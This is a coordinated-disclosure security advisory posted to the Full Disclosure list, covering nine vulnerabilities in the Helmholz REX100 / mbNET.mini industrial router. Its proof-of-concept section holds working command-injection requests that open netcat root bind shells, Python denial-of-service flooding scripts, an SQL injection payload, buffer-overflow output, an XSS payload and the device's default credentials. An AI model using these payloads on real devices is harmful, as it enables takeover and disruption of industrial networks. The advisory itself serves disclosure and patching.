| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <PAXP190MB1647661530A87AD635D7A749FE5CA@PAXP190MB1647.EURP190.PROD.OUTLOOK.COM>
Date: Thu, 24 Jul 2025 10:16:45 +0000
From: Thomas Weber | CyberDanube via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] St. Pölten UAS 20250721-0 | Multiple Vulnerabilities in Helmholz Industrial Router REX100 / mbNET.mini
St. Pölten UAS 20250721-0
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities in REX100
product| Helmholz Industrial Router REX100 / mbNET.mini
vulnerable version| < 2.3.3
fixed version| 2.3.3
CVE number| CVE-2025-41673, CVE-2025-41674, CVE-2025-41675,
| CVE-2025-41676, CVE-2025-41677, CVE-2025-41678,
| CVE-2025-41679, CVE-2025-41680, CVE-2025-41681
impact| High
homepage| https://www.helmholz.de/
| https://mbconnectline.com/
found| 2025-04-25
by| F. Bruckmoser, M. Eder, J. Heigl, M. Heudorn,
| G. Hofmarcher, M. Kadlec, M. Pristauz-Telsnigg
| S. Resch, P. Schweinzer, M. Gschiel
|
| These vulnerabilities were discovered during research at
| St.Pölten UAS, supported and coordinated by CyberDanube.
|
| https://fhstp.ac.at | https://cyberdanube.com
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"Helmholz is your specialist when it comes to sophisticated products for your
automation projects. With current, clever system solutions from Helmholz, the
high demands placed on industrial networks in times of increasing automation
can be met both reliably and efficiently - including a high level of operating
convenience. The broad product spectrum ranges from a decentralized I/O system
to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT
remote machine access."
Source: https://www.helmholz.de/en/company/about-helmholz/
Vulnerable versions
-------------------------------------------------------------------------------
Helmholz Industrial Router REX100 < 2.3.3
MBConnectline mbNET.mini < 2.3.3
Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Command Injection via send_sms (CVE-2025-41674)
A command injection vulnerability has been identified in the send_sms
functionality of the device. An authenticated attacker can exploit this issue
to execute arbitrary commands as root on the device.
2) Authenticated Command Injection via diag (CVE-2025-41673)
A command injection vulnerability has been identified in the diag
functionality of the device. An authenticated attacker can exploit this issue
to execute arbitrary commands as root on the device.
3) Authenticated Command Injection via communication.sh (CVE-2025-41675)
A command injection vulnerability has been identified in the communication.sh
endpoint of the device. An authenticated attacker can exploit this issue to
execute arbitrary commands as root on the device.
4) Authenticated Denial of Service via send_sms (CVE-2025-41677)
An denial of service condition has been identifed in the send_sms functionality
of the device. An authenticated attacker can exploit this issue to make the
device unresponsive until reboot.
5) Authenticated Denial of Service via send_mail (CVE-2025-41676)
An denial of service condition has been identifed in the send_mail
functionality of the device. An authenticated attacker can exploit this issue
to make the device unresponsive until reboot.
6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678)
A sql injection has been identified in the cloud-status.sh endpoint of the
device. The issue can be exploited by an authenticated attacker to read out or
modify the sqlite database of the device.
7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679)
A buffer overflow issue exists in the confnet service in the "serial" function
of the device. An unauthenticated attacker can exploit this issue to crash the
service or gain remote code execution on the device.
8) Unauthenticated Buffer Overflow via confnet/command (CVE-2025-41679)
A buffer overflow issue exists in the confnet service in the "command" function
of the device. An unauthenticated attacker can exploit this issue to crash the
service or gain remote code execution on the device.
9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681)
A persistent XSS vulnerability has been identified in the cloud-configure.sh
endpoint of the device. An authenticated attacker can abuse this issue to
execute malicious javascript in the victims browser when using the web service
of the device.
Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Command Injection via send_sms (CVE-2025-41674)
The action send_sms in the file /cgi-bin/cloud-status.sh is vulnerable to a
command injection. The following POST request can be used to create the file
/hello.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.43.18
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101
Firefox/138.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://10.69.34.3
DNT: 1
Sec-GPC: 1
Authorization: Basic <redacted>
Connection: keep-alive
Referer: http://10.69.34.3/cgi-bin/cloud-status.sh
action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)'
-------------------------------------------------------------------------------
2) Authenticated Command Injection via diag (CVE-2025-41673)
The action diag in the file /cgi-bin/cloud-status.sh is vulnerable to a command
injection. The following POST request can be used to start a binding shell on
port 8080.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.45.3
Content-Length: 71
Authorization: Basic <redacted>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
action=diag&operation=portcheck¶meter=-l -w 9999 -p 8080 -e /bin/sh
-------------------------------------------------------------------------------
3) Authenticated Command Injection via communication.sh (CVE-2025-41675)
The action nc in the file communication.sh is vulnerable to a command injection
the following GET request can be used to start a binding shell on port 1337.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
curl 'http://192.168.0.100/cgi-bin/cloudsvr/communication.sh?action=nc¶meter=-l%20-p%201337%20-e%20%2Fbin%2Fsh' \
-H 'Authorization: Basic aGVsbWhvbHo6cm91dGVy' \
--insecure
-------------------------------------------------------------------------------
4) Authenticated Denial of Service via send_sms (CVE-2025-41676)
The action send_sms is vulnerable to a denial of service condition. By sending
multiple requests, the system becomes unresponsive.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import requests
from concurrent.futures import ThreadPoolExecutor
HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 512
ATTACKS = 1000
param = {
'action': 'send_sms',
'numb': 'X' * LENGTH,
'text': 'X' * LENGTH,
}
url = f'http://{HOST}{PATH}'
def send_request(i):
with requests.Session() as s:
s.auth = ('helmholz', 'router')
print(f'[+] - Sending Packet NR {i+1}...')
s.post(url, data=param)
with ThreadPoolExecutor(max_workers=ATTACK) as executor:
executor.map(send_request, range(ATTACKS))
-------------------------------------------------------------------------------
5) Authenticated Denial of Service via send_mail (CVE-2025-41677)
The action send_mail is vulnerable to a denial of service condition. By sending
multiple requests, the system becomes unresponsive.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/env python3
import requests
from concurrent.futures import ThreadPoolExecutor
HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 24
ATTACKS = 5000
param = {
'action': 'send_email',
'addr': 'X' * LENGTH,
'subj': 'X' * LENGTH,
'text': 'X' * LENGTH
}
url = f'http://{HOST}{PATH}'
def send_request(i: int) -> None:
try:
with requests.Session() as session:
session.auth = ('helmholz', 'router')
print(f'[+] Sending packet #{i + 1} ...')
session.post(url, data=param, timeout=10)
except requests.RequestException as exc:
print(f'[-] Packet #{i + 1} failed: {exc}')
def main() -> None:
with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
executor.map(send_request, range(ATTACKS))
if __name__ == "__main__":
main()
-------------------------------------------------------------------------------
6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678)
A sql injection has been identified in the cloud-status.sh endpoint of the
device. An attacker could leverage this vulnerability to manipulate data inside
the sqlite database.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 10.69.35.3
Content-Length: 104
Authorization: Basic aGVsbWhvbHo6cm91dGVy
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101
Firefox/128.0
Origin: http://10.69.45.3
Referer: http://10.69.45.3/cgi-bin/cloud-status.sh
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
language=test%27%29%3B%20REPLACE%20INTO%20con-
fig%20%28name%2Cvalue%29%20VALUES%28%27hacked%27%2C%27yes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A verification shows the manipulated data:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ echo "SELECT * FROM config WHERE name = 'hacked';" | sqlite3 /etc/db/config
hacked|yes
-------------------------------------------------------------------------------
7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679)
The overflow is located inside the confnet binary. For exploitation the serial
number of the device is required. For interacting with the service, the script
by syss has been used.
(www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353):
R50168542
$ python3 cve-2024-45274.py cmd
R501685420000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000 192.168.0.100 get_fw
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.
-------------------------------------------------------------------------------
8) Unauthenticated Buffer Overflow via confnet/command (CVE-2025-41679)
The overflow is located inside the confnet binary. For exploitation the serial
number of the device is required. For interacting with the service, the script
by syss has been used.
(www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353):
R50168542
$ python3 cve-2024-45274.py cmd R50168542 192.168.0.100
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccc
ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccccccccccccccccccccccccccccccccccccccccccdddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffff'
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.
-------------------------------------------------------------------------------
9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681)
A persistent XSS vulnerability has been identified in the cloud-configure.sh
endpoint of the device. An authenticated attacker can exploit this issue to
inject arbitrary javascript which gets executed when going to the "help" page.
The impact of this vulnerability is very limited.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 192.168.0.100
Content-Length: 250
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Accept: text/html,application/xhtml+xml,application/xml;
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="langchange"
1
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="language"
";alert(1)//"
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm--
-------------------------------------------------------------------------------
The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.re).
Solution
-------------------------------------------------------------------------------
Update to the latest version.
Workaround
-------------------------------------------------------------------------------
Limit network access to the device or remove it if possible.
Recommendation
-------------------------------------------------------------------------------
St. Pölten UAS recommends Helmholz customers to upgrade the firmware to the
latest version available. It is advised to perform a security assessment by a
professional company.
Contact Timeline
-------------------------------------------------------------------------------
2025-06-11: Contacting Helmholz via psirt@...mholz.de.
2025-06-16: Contacting them again as their PGP setup was broken.
Sending them the advisory via secure channel.
2025-06-17: Response from manufacturer mbconnectline. Vulnerabilities are
reproducible and are present in latest firmware.
2025-07-21: Coordinated release with PSIRT@VDE and Helmholz.
Web: https://www.fhstp.ac.at/
Twitter: https://x.com/fh_stpoelten
Mail: mis@...tp.ac.at
EOF S. Dietz / @2025
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists